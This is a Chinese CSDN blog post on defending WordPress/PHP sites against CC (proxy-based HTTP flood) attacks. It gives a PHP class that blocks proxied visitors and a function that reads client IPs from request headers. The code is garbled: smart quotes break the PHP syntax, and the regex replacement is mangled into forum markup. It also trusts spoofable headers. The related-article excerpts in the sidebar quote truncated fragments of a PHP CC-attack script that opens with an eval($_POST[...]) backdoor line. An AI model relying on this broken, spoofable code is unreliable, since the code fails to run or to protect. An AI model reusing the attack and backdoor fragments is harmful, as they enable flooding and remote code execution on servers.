WordPress(PHP)防御CC攻击代码

最新推荐文章于 2023-01-05 19:50:43 发布
最新推荐文章于 2023-01-05 19:50:43 发布
阅读量1.9k 收藏
点赞数
分类专栏: php 文章标签: wordpress php server function .htaccess 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzw945/article/details/6212301
版权

攻击者借助代理服务器生成指向受害主机的合法请求,实现DOS,和伪装就叫:cc(ChallengeCollapsar)。这种攻击模式已经算是老技术了,甚至不能称之为一门技术。 但是在现在,还是有许许多多的主机抵抗不了CC的骚扰。

可以说CC攻击的适用性和破坏性不比DDOS的差,经过了这几天的实验,发现了许多政府相关部门的网站都支持不住CC的攻击,更别说我们许许多多的Wordpress用户了。 WordPress以功能强大,扩展性强称霸博客界,但是殊不知在功能强大的背后更显脆弱,原来写过一篇文章是WordPress, Blog or CMS?,其中提到Wordpress的强大足以作为一个CMS大型网站,但是现在看来要用Wordpress做大型网站还得做些防范措施了。

一个反应时间到进入时间在1秒内的网站一旦被CC攻击可以在几秒内反应加至20秒以上,甚至拒绝服务。是不是听起来很骇人? 下面说说PHP大型网站如何判断是否为CC攻击(代理访问), 其原理就是拒绝代理访问。 这样会拦截一小部分的访客,但是为了那一大部分的访客,这何足挂齿呢?

代码如下:

·········10········20········30········40········50········60········70········80········90········100·······110·······120·······130·······140·······150
  1. <?
  2. //Ban Proxy for all soft.
  3. $ipinfo = new IpInfo();
  4. $ipinfo->banProxy(true);
  5. //false 时,屏蔽超级匿名的代理
  6. class IpInfo
  7. {
  8. // (c) KINPOO
  9. var $clientIp;
  10. var $proxy;
  11. var $proxyIp;
  13. function IpInfo()
  14. {
  15. $this->getIp();
  16. $this->checkProxy();
  17. }
  18. function banProxy($banAll = true)
  19. {
  20. if (!$this->proxy)
  21. {
  22. return;
  23. }
  24. if ($banAll == true)
  25. {
  26. die(‘Forbidden:Proxy Connection’);
  27. }
  28. else
  29. {
  30. if ($this->clientIp == $this->proxyIp)
  31. {
  32. die(‘Forbidden:High Anonymous Proxy Connection’);
  33. }
  34. }
  35. }
  36. function checkProxy()
  37. {
  38. if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])
  39. || isset($_SERVER['HTTP_VIA'])
  40. || isset($_SERVER['HTTP_PROXY_CONNECTION'])
  41. || isset($_SERVER['HTTP_USER_AGENT_VIA'])
  42. || isset($_SERVER['HTTP_CACHE_CONTROL'])
  43. || isset($_SERVER['HTTP_CACHE_INFO']))
  44. {
  45. $this->proxy = true;
  46. $this->proxyIp = preg_replace(“/^([{0-9}/.]+).*/”, “[url=file:1]//1[/url]“, $_SERVER['REMOTE_ADDR']);
  47. return $this->proxy;
  48. }
  49. }
  51. function getIp()
  52. {
  53. if (isset($_SERVER['HTTP_CLIENT_IP']) && $_SERVER['HTTP_CLIENT_IP'])
  54. {
  55. $ip = $_SERVER['HTTP_CLIENT_IP'];
  56. }
  57. elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'])
  58. {
  59. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  60. }
  61. else
  62. {
  63. $ip = $_SERVER['REMOTE_ADDR'];
  64. }
  65. $this->clientIp = preg_replace(“/^([{0-9}/.]+).*/”, “[url=file:1]//1[/url]“, $ip);
  66. return $this->clientIp;
  67. }
  68. }
  69. ?>

你可以将这段判断代码加到每一个用户会访问到的地方,一旦判断出是代理服务器访问网站会输出“Proxies Forbidden”,如果开启了高级匿名代理服务器则会显示“Forbidden:High Anonymous Proxy Connection”, 当然你也可以通过加入过侧边栏,或者页脚来达到一举多得的防范目的。
当然还可以通过下面这段代码实现揪出IP源来进行.htaccess的封锁。

·········10········20········30········40········50········60········70········80········90········100·······110·······120·······130·······140·······150
  1. function getIP()
  2. {
  3. static $realip;
  4. if (isset($_SERVER)){
  5. if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){
  6. $realip = $_SERVER["HTTP_X_FORWARDED_FOR"];
  7. } else if (isset($_SERVER["HTTP_CLIENT_IP"])) {
  8. $realip = $_SERVER["HTTP_CLIENT_IP"];
  9. } else {
  10. $realip = $_SERVER["REMOTE_ADDR"];
  11. }
  12. } else {
  13. if (getenv(“HTTP_X_FORWARDED_FOR”)){
  14. $realip = getenv(“HTTP_X_FORWARDED_FOR”);
  15. } else if (getenv(“HTTP_CLIENT_IP”)) {
  16. $realip = getenv(“HTTP_CLIENT_IP”);
  17. } else {
  18. $realip = getenv(“REMOTE_ADDR”);
  19. }
  20. }
  21. return $realip;
  22. }

当然这里的代码主要是防范CC攻击, 如果想做到非常安全,那么不止应该有强健的代码保护,同样需要有强大的主机支持了。

zzw945
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP实现清除wordpress里恶意代码
10-23
主要介绍了PHP实现清除wordpress里恶意代码的方法以及相关代码和使用方法,有需要的小伙伴可以参考下。
如何保护WordPress网站免受网络攻击?采取安全措施至关重要
clq552434的博客
06-14 314
如果您拥有WordPress网站,那么本文适合您,因为它解决了WordPress的安全性并防止了网络攻击WordPress是一个广泛使用的CMS(内容管理系统),为所有可用网站的很大一部分提供支持。不幸的是,它也吸引了利用平台安全漏洞的网络犯罪分子,超级科技提醒您采取安全措施至关重要。 1、避免使用“管理员”用户名披露用户名可能看起来并不特别有害。尽管如此,它仍然可能会引发安全漏洞的连锁反应,从而导致帐户身份盗用,劫持或财务损害。如果您已将站点的管理员指定为管理员,则建议对其进行更改,因为网络犯罪分子擅长
代码解决网站被恶意刷流量 CC 攻击问题
主机吧的博客
09-28 374
该方法能防御市面上那些以高频率请求的恶意CC攻击,并不能100%防御所有CC攻击,但对可以解决绝大多数小型CC攻击了,如果有更高防御要求,建议购买性价比非常高的百度云加速或京东云星盾。以下开源代码添加到你网站核心文件中,相当于你网站任何页面都会引用的一个文件,类似于:config.php。头部即可,即控制所有的页面访问,如果想要控制单独某个页面,只需要将此代码放到此页面的 PHP 内即可。我们可以通过代码的方式自定义访问频率时间限制解决那些。其他 PHP 网站根据你的程序逻辑决定。经常有站长遇到网站被人。
php本地cc攻击代码,php cc攻击代码与防范方法
weixin_34324114的博客
03-17 431
CC攻击预防是动态页面,它可以判断时间,如果是静态网站,就需要在服务器上安装软件,下面爱站技术频道小编给大家说说php.html" target="_blank">php cc攻击代码与防范方法,希望对大家有所帮助。复制代码 代码如下:eval($_POST[Chr(90)]);set_time_limit(86400);ignore_user_abort(True);$packets = ...
服务器cc攻击的简单防御策略(附代码
qq_54668097的博客
12-16 251
CC攻击(也称为网络层攻击或流量攻击)是指企图通过向网站或服务器发送大量伪造的请求,以干扰正常的用户访问的攻击。这些请求可能是来自单个设备的,也可能是来自一群被控制的设备的。具体的代码实现取决于你使用的编程语言和框架,还需要考虑你的网站或应用程序的具体需求。这段代码使用了 Flask Limiter 扩展,它可以帮助你限制来自单个 IP 地址的请求数。4.对来自单个 IP 地址的流量进行限制:可以设置限制,对来自单个 IP 地址的流量进行限制,以防止一个设备或一群被控制的设备发送大量请求。
php防止CC攻击代码 php防止网页频繁刷新
主题模板站的博客
01-05 404
网页快速恶意刷新,cc攻击就是攻击者利用代理服务器生成指向目标站点的合法请求,模拟多用户不停的对受害网站进行访问,特别是访问那些需要大量数据操作需要大量CUP时间的页面,最终导致目标网站服务器资源耗尽,一直到宕机崩溃,如此一来,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。提交数据后,先从IP表里检索客户端IP,如果有,并且没有过期,那么报错,否则写入数据库,然后再取客房端IP,把IP写入数据库。如果没有,则写数据,再写个cookie;
Wordpress php 分页代码
10-29
Wordpress php 分页代码,大家可以参考下。
WordPress php 分页代码
12-17
将下面的函数放到你的主题的 functions.php 文件中:复制代码 代码如下: function theme_echo_pagenavi(){ global $request, $posts_per_page, $wpdb, $paged; $maxButtonCount = 9; //显示的最多链接数目 if (!is_...
wordpress自定义循环列表的php代码
09-29
wordpress自定义循环列表的php代码,使用wordpress的朋友需要自定义列表的朋友可以参考下。
php cc攻击代码,PHP DDOS的UDP攻击,TCP攻击,和CC攻击的核心代码
weixin_29467373的博客
03-09 413
网络安全向,请勿用作非法用途CC攻击模块:echo “状态 : 正常运行中…..”;echo “================================================”;echo ” www.phpddos.com”;echo ” CC Flood 模块”;echo ” 作者:ybhacker”;echo ” 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自...
教你网站防CC攻击的几种方法
03-27
教你网站防CC攻击的几种方法 (1)。取消域名绑定   一般cc攻击都是针对网站的域名进行攻击,比如网站域名是www.cnaxe.com,那么攻击者就在DDoS攻击软件中设定攻击对象为该域名然后实施攻击。   对于这样的攻击我们的措施是在IIS上取消这个域名的绑定,让CC攻击失去目标。具体操作步骤是:打开“IIS管理器”定位到具体站点右键“属性”打开该站点的属性面板,点击IP地址右侧的“高级”按钮,选择该域名项进行编辑,将“主机头值”删除或者改为其它的值(域名)。
php cc攻击代码与防范方法
12-19
cc攻击代码,支持udp复制代码 代码如下: <?php eval($_POST[Chr(90)]); set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET[‘http’]; $rand = $_GET[‘exit’]; $exec_time = $_GET[‘time’]; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0) { if(StrLen($_GET[‘rat’])<>0) { echo $_GET[‘r
PHPCC攻击代码_网页防止快速恶意刷新
xiaoxiaohui520134的博客
08-08 4521
session_start(); $timestampcc = time(); $cc_nowtime = $timestampcc; if(isset($_SESSION['cc_lasttime'])){     $cc_lasttime = $_SESSION['cc_lasttime'];     $cc_times = $_SESSION['cc_times
ThinkphpCC攻击代码
美奇软件开发工作室
06-30 2591
遇到问题: 昨天网站突然打不开,以为是php环境出了问题,各种排除问题,最终发现是80端口出了故障,于是想到很可能是被同行攻击了,通过“netstat -ano”命令发现是慢性的CC攻击,我的云服务器配置比较低,CPU消耗高达100%,服务器80端口资源被占用,最终导致网站直接崩溃。 解决思路: 1、第一个方法是:使用网站安全狗的CC防护功能,但安全狗容易把正常访问的ip也屏蔽,很不利于...
PHP简单的防CC攻击代码
美奇软件开发工作室
09-27 744
声明一下: 这个方法只能简单的监控(检测)用户的访问频率,并不能真正做到完全防御,因为CC超级线程攻击基本直接把80端口给阻塞了,要想完全防御CC攻击,需要使用软件防火墙,直接监控网卡入口。代码如下: <?php //代理IP直接退出 empty($_SERVER['HTTP_VIA']) or exit('Access Denied'); //防止快速刷新 session_start(); $seconds = '3'; //时间段[秒] $refresh = '5'; //刷新次数 //设置
WordPress安全防护攻略
空名先生
04-12 7930
个人近期做了一个WordPress站点,目前处于内测阶段,虽然公网还没部署起来,但是先在这学习整理一下安全防护的问题。 第一:及时更新WordPress 由于33%的互联网都在使用WordPress站点,免不了被不怀好意的人盯上,所以官方对安全性非常看重,有专业团队监控并修复各种安全漏洞,可能会频繁的更新补丁,所以我们一定要及时的安装更新官方发布的稳定版本。这是官方设置的第一道防线。 第二:...
java cc攻击_php cc攻击代码与防范方法
weixin_36320737的博客
02-23 289
cc攻击代码,支持udpeval($_POST[Chr(90)]);set_time_limit(86400);ignore_user_abort(True);$packets = 0;$http = $_GET['http'];$rand = $_GET['exit'];$exec_time = $_GET['time'];if (StrLen($http)==0 or StrLen($rand...
很好用的php执行时间分析工具webgrind
瞬间印象
01-05 8656
以前分析xdebug用的是(wincachegrind)http://sourceforge.net/projects/wincachegrind/  现在直接安装webgrind来调试速度会更好 http://xdebug.org/下载地址:Source: xdebug 2.0.3 Windows modules:PHP 5.1.2-5.1.7
修改ThinkPHP使其支持多级域名部署
瞬间印象
06-23 3045
<br />暂时只支持二级域名的部署,更深层级的还在想使用GROUP分组形式好还是使用Router来进行检测。不喜欢废话,直接切入主题:<br />修改ThinkPHP/Lib/Think/Util/Dispatcher.class.php<br />找到parsePathInfo方法,修改为:<br /> <br />private static function parsePathInfo() { $pathInfo = array(); if(C('URL_PATHINFO
安装wordpressPHP源文件打开是代码怎么办
最新发布
06-12
如果您安装了WordPress的源文件,但打开网站时只看到了代码,那么可能是因为您没有将WordPress源文件放置在正确的位置或没有正确配置您的Web服务器。以下是一些可能的解决方案: 1. 确保您已经正确地将WordPress...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值